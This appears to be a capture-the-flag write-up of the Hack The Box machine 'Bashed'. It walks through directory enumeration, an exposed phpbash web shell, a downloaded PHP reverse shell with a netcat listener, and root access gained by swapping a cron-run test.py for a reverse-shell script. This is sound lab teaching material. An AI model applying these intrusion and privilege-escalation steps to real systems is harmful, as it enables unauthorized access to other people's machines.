Bashed is rated easy among other boxes on htb, thought would do without taking help from the internet. But failed , However clarified many concepts.
Let’s share those learning's with you all while exploiting the box without metasploit.
A simple bash script that uses Nmap to enumerate the host.
Don’t forget to give executable permission to the script.
chmod +x en.sh
Points to consider:
- Only one service and port 80. Apache → 2.4.18 (http)
- Website title can be “Arrexel’s Development Site”.
- Go to thought after looking at port 80 is dirbuster/gobuster/nikto.
Let’s visit the site first.
phpbash is definitely a hint to move forward. Don’t know what it is though… :[ But the description says that it helps with pentesting and it is present generally on servers and it is present here too..
Let’s go to Dirbuster to Enumerate this further. Meanwhile let’s check for phpbash on the Internet.
This is what i found in the official git Repository. I am guessing that it is a web shell used on web servers mainly for testing purpose.
If you are interested to learn more about web shells, please go to https://www.hackingarticles.in/web-shells-penetration-testing/
We will look for phpbash.php or phpbash.min.php in our Dirbuster Results.
Set number of threads to 20,30 or more, depending on your machine’s hardware.
For file with list of dirs/files, Go to Browse and select the path “/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt”
One can use any other list as per their wish , i am using the one mentioned above.
As i always say, It is a good habit to set the file extension, whenever dirbuster is used.
here it will look for .php files, .py files, .sh files, .txt files inside of directories.
Several files to consider here,
- first of all, we got both the files phpbash.php and phpbash.min.php (My thoughts were like uploading those files and exploiting must be the task, but it is already present.)
- sendMail.php is the file of open source email server.
- there is a folder called uploads, thought will have some webpage to upload stuff. but it is empty. (tried to traverse to the page manually , but it was empty)
Let’s go to phpbash.php in browser.
It looks like your kali terminal, isnt that great ..!!
sudo -l stated that there is a user called scriptmanager, who needs no password.
Did not thought it was that easy to get a user.txt, let’s go for root now.
As we have already seen that www-data can change to scriptmanager user without password however, there are several problems.
The shell we have is semi-interactive, so some functionalities are missing i guess. hence, we require a full shell.
On researching, i got to know that kali has inbuilt reverse shell scripts for php. so let’s edit that script as per our requirement and try to run from phpbash.php shell.
Don’t forget to change the IP and PORT NO. (Use attacker machine’s IP and Port No.)
Next Step I thought was to wget the file to phpbash.php shell, but failure was waiting there…..
Before that, I fired up Python’s built in SimpleHTTPServer to start an http server on my machine.
Failed while downloading the file , and learned that only for some directories, the permission is granted to users. One of which is /tmp.
Start Netcat in listening mode for the port number , set in php-reverse-shell.php script before wget. In my case it is 1234.
nc -nvlp 1234
Tried running the script using the command
Got the shell, but i noticed that this is still not fully interactive , also noticed a directory called scripts. Let’s Learn to obtain the stable and interactive shell before going to that folder.
Using python to upgrade the dumb shell.
python -c 'import pty; pty.spawn("/bin/bash")'
After this, scriptmanager user is getting accessed with /bin/bash shell.
Two scripts namely test.py and test.txt is found inside the scripts dir.
On a closer look , it is found that test.txt is the output file generated by test.py
but then who is executing test.py …??? (In such scenarios, a cron job is set to execute the script)
Secondly, test.txt is owned by root. it can be deduced that cron job is executing the script with root permissions.
And if we perform ls -la command again to check the latest time when the script was executed , we can see that it is executing every minute.
Let’s try to add the python script to own root shell into this test.py from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Don’t forget to update the ip and port no.
One thing i struggled is to edit the test.py script.
I don’t know why…
Found another Workaround for this , downloaded the rootshell script, deleted the original test.py & renamed the rootshell script to test.py
Setup a nc listener with the port mentioned in the script and wait for a minute or less..
You can run the script manually if don’t wanna wait to see the “#” .
Hey there, Root
Thank you for finding this helpful.
Please click on clap button if you learn anything new today.